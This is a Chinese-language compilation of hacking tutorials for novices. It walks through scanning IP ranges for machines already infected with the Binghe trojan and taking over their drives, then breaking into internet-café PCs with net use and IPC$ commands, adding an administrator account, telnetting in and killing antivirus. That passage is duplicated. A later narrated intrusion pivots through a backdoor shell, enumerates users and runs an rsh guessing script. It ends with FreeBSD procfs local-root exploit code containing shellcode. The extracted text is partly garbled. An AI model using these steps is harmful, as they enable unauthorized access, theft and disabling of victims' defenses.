黑客电脑教程

1、如何一步一步进入别人计算机!跟着TTY 一步一步走进对方计算机：这道快餐是专门为从来没有通过网络进入过对方计算机的网络新手们准备的，主要使用的软 件就是著名的国产木马冰河2.2,所以，如果你已经使用过冰河2.2,就不必跟着我们往下走 了。其他有兴趣的网络新手们，Lets go！第一步下载网络新手快餐软件包tty.zip到网络休闲庄（）“红客软 件”- “中文软件”里下载网络新手快餐软件包，文件名是：tty.zip。该软件包里准备了 本次实验所需的所有软件，大小811K。解开tty.zip，里面应有1号、2号、两个软件，是 为了叙述方便而编的号，1号软件就是端口扫描工具“网络刺客II”，2号软件

2、就是著名的国 产木马冰河2.2的控制端。下载完毕并解压缩之后跟我进行第二步！第二步运行1号软件，首先出现的是“网络刺客II注册向导”，别理它，点击“稍后（Q） ”就进入了 网络刺客II的主界面。第三步 在网络刺客II的主界面里选“工具箱（U）” -“主机查找器（H）”，就进入了 “搜索 因特网主机”界面。第四步 进入“搜索因特网主机”界面后，“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己 去选择了，比如你可以选61.128或选61.200等等，“结束地址”栏填XXX.XXX.255.255其中 XXX.XXX的选择要和前面一样。“端口”栏填7626，其他栏保持默认不动。好了，以上

3、设置就 是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了，再检 查一下填对没有？如果一切OK，请点击“开始搜索”。第五步观察“总进度”和“段进度”是否在走动。如果没有走动，那一定是IP地址设置不 对，请认真检查。如果两个进度都在走动，呵呵，你就成功一半了，至少你会使用网络刺客 II扫描网上开放某一端口的计算机了。下面你要作的就是静静的等待，学用黑客软件是需要 耐心的。大约20-30分钟后，最下面的记录栏里就应该出现记录了（一般情况下，应该有5、 6条记录）。每一条记录代表找到的中了冰河木马的一台计算机，前面是该计算机的IP地址， 后面是762

4、6 （冰河木马端口）。第六步点击“停止搜索”，但不要退出程序，到第十二步时还要用。运行2号软件冰河，进 入冰河主界面。选“文件F” -“添加主机A”进入添加主机窗口。第七步在“添加主机”窗口，“显示名称”里填入第五步里搜索到的第一条IP地址，当IP 地址填入“显示名称”里后，“主机地址”里就自动填入相同的IP 了。“访问口令”不填，“监 听端口 ”保持默认的7626。好了，检查一下IP有没有填错，如果OK，点击“确定”，在冰河 主界面的“文件管理器”里就出现了刚才填入的IP地址了。第八步这一步和下一步最重要，请认真看清楚！在冰河的主界面里，点击“文件管理器”里 的“我的电脑”，这时“文件管理器

5、”右边的框里就会出现你自己的硬盘分区。比如，如果你 的硬盘分的是四个区，“文件管理器”右边的框里就会从上往下依次出现C：、D：、E：、F：， 如果你的硬盘分的是两个区，就会出现C：、D：。第九步点击“文件管理器”里刚才输入的第一条IP地址，稍等片刻（网速慢的情况下约10-30 秒），在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗？看到了？ 呵呵，祝贺你，你已经成功地进入对方的计算机了 ！第十步TTY，没有出现对方计算机的硬盘分区！呵呵，别急，看看冰河主界面最下端的状 态栏里有什么提示，如果是下面两种情况，就放弃，返回第七步，填入搜索到的第二条IP 地址：1、状态栏里出现“口

6、令不对”、“口令错误”、“密码不对”、“密码错误”等之类的提示， 表示该计算机的冰河木马是加了密码的，没有办法，只得放弃!2、状态栏里出现“正在解释 命令，可能是1.2以前版本”等之类的提示，也放弃，新手是搞不定的，如果以后你熟练了 可以给对方升级，这是后话！第十一步如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示，先别忙放弃， 重复3-4遍第八步到第九步的操作，即点击“我的电脑”-点击输入的IP地址，如此反复 3-4遍后，还是不行的话再放弃，返回第七步，填入搜索到的下一条IP地址。第十二步如果所有搜索到的IP地址按照第七步至第十一步操作后都不能进入对方计算机， 呵呵，那是你的运

7、气太差！别急，这样的运气TTY是经常碰到的！再返回第五步，在“搜索 因特网主机”界面里点击“开始搜索”，这时该程序又从你停止的IP地址接着往下搜索了！ 呵呵，等吧！搜索吧！ TTY说过，只要你有时间，你一定能成功！第十三步哇！ TTY！ ！终于成功了，！ ！我见到对方计算机硬盘分区了！ ！呵呵，怎么样？你 成功了，我的任务完成了！ ByeBye!进入对方计算机后，所有的操作和自己计算机“文件管 理器”里的操作一模一样！作者：TTY OICQ1506414 主页 HYPERLINK 二。年十月 于 网络休闲庄本文首刊电子邮件杂志网络休闲庄第七期打开注册表编辑器，找到：HKEY_LOCAL_MAC

8、HINE/Software/Microsoft/Windows/Current Version/Winlogon，在右边窗口点击右键一新建一字符串值，然后为它命名：“Legal Notice Caption”，接着点击右键一新建一字符串值，为其命名为：“Legal Notice Text”，双击“Legal Notice Caption，然后输入你想在登录窗口显示的标题（比如：有毒！请勿进入！）， 双击“Legal Notice Text”，输入你想在登录对话框中显示的文字（比如：本机感染恶性病毒， 请不要进入，否则后果自负！）。这样，以后如果某个人想启动你的电脑，这个由你定制的新对话框就会在

9、登录系统前显示 出来。建议你最好为系统再加上登录密码，要不然胆大的人点击确定，也能够直接进入系统。如何入侵别人电脑在这里告诉大家如何入侵别人电脑，从而演绎我们那在别人电脑上无所不能的神话 首先要确定要入侵电脑的IP,关于IP,网吧的编号和IP地址通常是相同或高一位，比如编 号为20的电脑，IP 一般是0或1？?大家要是上贴吧匿名发帖子的话，也会看见IP地址有了 IP地址后，就可以连接那将被你入侵的倒霉电脑了，一般登陆电脑的用户名多是“user 编号的形式空密码形式，所以在“命令提示符”下输入net?use?/IP地址/ipc$/user:及net?use?/IP 地址/ipc$/user:us

10、er 编号”命令进行连接连接成功后必须关闭对方电脑的杀毒软件，右击“我的电脑”选择“管理”在弹出窗口中右 击“计算机管理（本地）”，选择“连接另一台计算机”，连接至那台倒霉电脑的IP号，启动“Tenlet ”服务然后在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。net?user?user 编号/addnet?localgroup?administators?user 编号/add然后进入C:WinntSystem32，右击CMD.EXE，选择“创建快捷方式”，然后右击快捷方式，选择“属性”，选择“以其他用户身份运行”，运行快捷方式CMD，弹出“以其他用户身份运行

11、”窗口后，输入“user编号”回车用telnet?电脑IP编号?登陆至那个倒霉孩子的电脑，再从网上下载一个命令行下杀进程的软件，比如说knlps等，在telnet上将杀毒软件进程关闭这样就OK 了做你想做的事吧，呵呵，有兴趣的试试有兴趣的去我空间，我Q292413458，呵呵空间里都是电脑应用如何入侵别人电脑在这里告诉大家如何入侵别人电脑，从而演绎我们那在别人电脑上无所不能的神话首先要确定要入侵电脑的IP，关于IP，网吧的编号和IP地址通常是相同或高一位，比如编 号为20的电脑，IP 一般是0或1？?大家要是上贴吧匿名发帖子的话，也会看见IP地址有了 IP地址后，就可以连接那将被你入侵的倒霉电

12、脑了，一般登陆电脑的用户名多是“user 编号的形式空密码形式，所以在“命令提示符”下输入net?use?/IP地址/ipc$/user:及net?use?/IP 地址/ipc$/user:user 编号”命令进行连接连接成功后必须关闭对方电脑的杀毒软件，右击“我的电脑”选择“管理”在弹出窗口中右 击“计算机管理（本地）”，选择“连接另一台计算机”，连接至那台倒霉电脑的IP号，启动“Tenlet ”服务然后在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。net?user?user 编号/addnet?localgroup?administators?user 编号

13、/add然后进入C:WinntSystem32，右击CMD.EXE，选择“创建快捷方式”，然后右击快捷方式，选择“属性”，选择“以其他用户身份运行”，运行快捷方式CMD，弹出“以其他用户身份运行”窗口后，输入“user编号”回车用telnet?电脑IP编号?登陆至那个倒霉孩子的电脑，再从网上下载一个命令行下杀进程的软件，比如说knlps等，在telnet上将杀毒软件进程关闭这样就OK 了做你想做的事吧，呵呵，有兴趣的试试有兴趣的去我空间，我Q292413458，呵呵空间里都是电脑应用本文的写作目的仅仅是为了给某些粗心大意的网络管理人员一个警告一一internet是有趣 但十分脆弱的，当你的计算

14、机放在互联网上给人们提供信息与服务的同时，会引来网络中的 “好奇者”的窥探。而安全性与便利性是一对矛盾在你对自己的网络做了一个安全策略 考量之后，你应该确定你愿意以多大的风险来使用一些方便的服务，当然这些服务一一比如 rlogin，可能只会使你少输入一次密码首先是确定目标撞大运乱挑一个吧，试试能不能成功呵，于是登上yahoo,上taiwan的站点小遛了一下唔，这个还不错，我们姑且称其为 HYPERLINK 还是先ping 一下看看情势如何一一别碰上有墙的就逊了C:ping HYPERLINK Pinging HYPERLINK 11 with 32 bytes of data:Reply fr

15、om 11: bytes=32 time=621ms TTL=241Reply from 11: bytes=32 time=620ms TTL=241Reply from 11: bytes=32 time=611ms TTL=241Reply from 11: bytes=32 time=591ms TTL=241速度还是很快的嘛那就开始吧 先登上某台跳板台湾的机器一一这样安全一些，不会留下你自己的IP(当然，说句题外 话这样要追查到还不是很困难，曾经有个朋友同我说过，南方某大学一次被黑，种种迹 象都表明黑客来自美国，IP、更改后主页上留下的话语朋友受托去补漏查源，发现那IP 是美国一个提

16、供免费shell的服务供应商于是申请了一个shell，通过一系列动作成为 root，查看系统日志一一真相大白，IP居然指向那家大学自身)。通过跳板还有一个好处一一如果你的尝试失败，在系统日志里留下来的是台湾本土的IP，这 样的登陆失败命令比较不会引起系统管理员的注意 C:nc *.*.*.* 12345就登上跳板了，12345端口里我预留了一个suid的shell 好了，祭起宝刀nmap# ./nmap -sT -O 11Starting nmap V. 2.3BETA12 by Fyodor ( HYPERLINK mailto:fyodor fyodor , HYPERLINK /nmap

17、/ /nmap/ ) Interesting ports on HYPERLINK (11): Port State Protocol Service 7 open tcp echo 9 open tcp discard 19 open tcp chargen 21 open tcp ftp 23 open tcp telnet 25 open tcp smtp 37 open tcp timeopen tcp fingeropen tcp http 111 open tcp sunrpc 443 open tcp httpsopen tcp execopen tcp loginopen tc

18、p shellopen tcp printer 540 open tcp uucp 3306 open tcp mysqlTCP Sequence Prediction: Class=random positive increments Difficulty=55346 (Worthy challenge)No OS matches for host (If you know what OS is running on itNmap run completed - 1 IP address (1 host up) scanned in 17 seconds 唔，运气还不错，提供的服务不少，估计

19、漏也少不到哪儿去只是没判断出系统 类型，这些服务里看上去可以利用的有：Port State Protocol Service21 open tcp ftp25 open tcp smtpopen tcp fingeropen tcp http111 open tcp sunrpcopen tcp execopen tcp loginopen tcp shell540 open tcp uucp3306 open tcp mysql最近rpc攻击非常流行，原因之一恐怕是方便易行一一只要存在漏洞，远程就可以 得到一个rootshell甚至对计算机完全不懂的外行也能轻易实施，呵，那咱们 来看看这个1

20、11 port的sunrpc里有什么奥妙吧rpcinfo -p 11&21404program vers proto port service100000 2 tcp 111 rpcbind100000 2 udp 111 rpcbind咦，看来没戏唱哦好在还有那么多服务，待偶慢慢试来看看是什么FTP服务器软件吧，说不定有远程溢出的漏洞呢./nc 11 21#乖乖龙的东，什么输出也没有就关上了，这是如何一回事？C:ftp 11Connected to 11.Connection closed by remote host.呵呵，看来过滤掉了嘛怎么办？看看25端口是运行什么SMTP服务的吧./n

21、c 11 25220 *-*-*-* ESMTP Sendmail 8.9.3/8.9.3; Wed, 5 Apr 2000 08:56:59 GMT Sendmail 8.9.3/8.9.3?好象没有什么致命的漏洞呀看看是什么WEB服务器先(echo head /http/1.0”;echo;echo)|./nc -w 3 11 80501 Method Not ImplementedMethod Not Implementedhead to /http/1.0 not supported.Invalid method in request head /http/1.0Apache/1.3.

22、9 Server at *-*-*-* Port 80阿帕奇这个版本的东东至少偶的印象中没有什么“死穴” 好在开了 finger，俺就土土地先把用户列表弄出来吧finger HYPERLINK mailto:O O HYPERLINK rootaaabbbcccddd总算有点收获，那么下一步该做什么呢？既然这台主机开了 512、513、514的r系列服 务，那就值得尝试一下，说不定哪个偷懒的家伙直接在.rhosts里设了+ username那我就爽了顺手写了个shell script，让它去一个一个地尝试rsh命令，传到肉鸡上chmod 700 rsh.shnohup ./rsh.sh HYP

23、ERLINK 它会自动地在/etc/passwd和/etc/shadow里加上finger出来的用户名，然后su过去，再对 远程目标11执行rsh命令，成功则返回该用户名然后将备份的passwd 和shadow再拷回去删除临时文件，生成报告文件(或许是我对.rhosts的理解还有 问题，有时我在机里加上+ +但rcp时还会报Permission denied或者connectrefused,所以 干脆都su成用户一一或许太笨;)我便再去MUD里当我的大虾了半个小时后回来,登上肉 鸡，读取报告文件.rsh.txtcat ./.rsh.txtccchehe，非常抱歉，看来俺得到一个shell 了进

24、去看看rlogin -l ccc 11Last login: Fri Mar 24 19:04:50 from 47Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994The Regents of the University of California. All rights reserved.FreeBSD 3.2-RELEASE (GENERIC) #0: Tue May 18 04:05:08 GMT 1999You have mail.呵，原来是FreeBSD 3.2-RELEASE呀，感觉不错，进来了，看看我的权限

25、如何吧ididuid=1003(ccc) gid=1003(ccc) groups=1003(ccc)看来能做的事还相当有限噢再看看系统里有没有别人先ww9:03PM up 6 days, 2:37, 3 users, load averages: 0.00, 0.01, 0.00USER TTY FROM LOGIN IDLE WHATccc p0 *.*.*.* 6:04PM 2:41 -tcsh (tcsh)不错，就我自在逍遥看看passwd吧cat /etc/passwdcat /etc/passwdroot:*:0:0:Charlie &:/root:/usr/local/bin/b

26、ashaaa:*:1005:2000:/home/www:/usr/local/bin/tcshbbb:*:1006:1006:/home/bbb:/usr/local/bin/tcshccc:*:1003:1003:/home/ccc:/usr/local/bin/tcshddd:*:1008:1008:ddd:/home/www:/usr/local/bin/tcsheee:*:1009:1009:eee:/home/eee:/usr/local/bin/tcsh很明显/home/www就是www用户的主目录了先看看俺ccc对该目录有没有写权限echo test /home/www/tes

27、ttest: Permission denied.看来如果想改他的主页，还得另外想办法啦不过都已经有了一个用户shell 了，最高权 限其实也只有一步之遥啦，好吧，翻翻数据库里有什么关于FreeBSD 3.2的记录，看来东西 不多呀而且有些还是安装外来软件包之后才带来的风险先看看有没有编译的权限再说吧，否则还得找一台BSD来编译ls /usr/local/bin|grep gccgcc一般情况下自己安装的gcc是会在这个目录的啦，否则最好find 一下比较保险。这下方便了可以直接传代码上来试试了几个之后我找到这么个东西：/* by Nergal */#include#include#inclu

28、de#include#include#include#include#include#includechar shellcode=xebx0ax62x79x20 x4ex65x72x67x61x6cx20”xebx23x5ex8dx1ex89x5ex0bx31xd2x89x56x07x89x56x0fx89x56x14x88x56x19x31xc0 xb0 x3bx8dx4ex0bx89xcax52”x51x53x50 xebx18xe8xd8xffxffxff/bin/shx01x01x01x01 x02x02x02x02x03x03x03x03x9ax04x04x04x04x07x04x0

29、0”;#define PASSWD ”./passwd”voidsg(int x)intmain(int argc, char *argv)unsigned int stack, shaddr;int pid,schild;int fd;char buff40;unsigned int status;char *ptr;char name4096;char sc4096;char signature = signature;signal(SIGUSR1, sg);if (symlink(usr/bin/passwd”,PASSWD) & errno!=EEXIST)perror(creatin

30、g symlink:);exit(1);shaddr=(unsigned int)&shaddr;stack=shaddr-2048;if (argc1)shaddr+=atoi(argv1);if (argc2)stack+=atoi(argv2);fprintf(stderr,shellcode addr=0 x%x stack=0 x%xn”,shaddr,stack);fprintf(stderr,Wait for Press return、 prompt:n);memset(sc, 0 x90, sizeof(sc);strncpy(sc+sizeof(sc)-strlen(shel

31、lcode)-1, shellcode,strlen(shellcode);strncpy(sc,EGG=”,4);memset(name,x,sizeof(name);for (ptr = name; ptr?/sbin/mount/dev/wd0s1a on / (local, writes: sync 12 async 134)/dev/wd0s1h on /home (local, writes: sync 2 async 120)/dev/wd0s1f on /usr (local, writes: sync 2 async 93)/dev/wd0s1g on /usr/local

32、(local, writes: sync 2 async 16)/dev/wd0s1e on /var (local, writes: sync 118 async 498)procfs on /proc (local)呵呵不错，看到没有那procfs on字样？看来老天帮忙了一个无特权的进程A自我调用子进程B, A打开/proc/pid-of-B/mem, B执行一个setuid的 二进制程序，现在B与A的euid已经不同了，但A仍然通过/proc/pid-of-B/mem的描述符 控制B进程，就可能做很多事了In order to stop this exploit, an additio

33、nal check was added to the code responsible for I/O on file descriptors referring to procfs pseudofiles. In miscfs/procfs/procfs.h (from FreeBSD 3.0) we read:/*Check to see whether access to target process is allowedEvaluates to 1 if access is allowed.*/#define CHECKIO(p1, p2) (p1)-p_cred-pc_ucred-c

34、r_uid = (p2)-p_cred-p_ruid) & (p1)-p_cred-p_ruid = (p2)-p_cred-p_ruid) & (p1)-p_cred-p_svuid = (p2)-p_cred-p_ruid) & (p2)-p_flag & P_SUGID) = 0) | (suser(p1)-p_cred-pc_ucred, &(p1)-p_acflag) = 0) As we see, process performing I/O (p1) must have the same uids as target process (p2), unless. p1 has ro

35、ot priviledges. So, if we can trick a setuid program X into writing to a file descriptor F referring to a procfs object, the above check will not prevent X from writing. As some of readers certainly already have guessed, F,s number will be 2, stderr fileno. We can pass to a setuid program an appropr

36、iately lseeked file descriptor no 2 (pointing to some /proc/pid/mem), and this program will blindly write there error messages. Such output is often partially controllable (e.g. contains programs name), so we can write almost arbitrary data onto other setuid programs memory. This scenario looks similar to close(fileno(stderr); execl(setuid-program”,.) exploits, but in fact differs profoundly. It exploits the fact that the properties of a fd pointing into procfs is not determined fully by open syscall (all other fd are; skipp